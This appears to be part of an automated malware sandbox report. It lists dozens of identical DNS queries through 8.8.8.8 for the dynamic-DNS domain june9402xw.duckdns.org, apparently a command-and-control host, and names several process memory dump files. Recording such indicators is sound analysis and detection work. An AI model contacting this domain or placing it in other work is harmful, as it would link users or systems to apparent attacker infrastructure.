| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
Files
memory/1200-0-0x00007FF849CA3000-0x00007FF849CA5000-memory.dmp
memory/1200-1-0x0000000000A40000-0x0000000000A4E000-memory.dmp
memory/1200-2-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp
memory/1200-3-0x00007FF849CA0000-0x00007FF84A761000-memory.dmp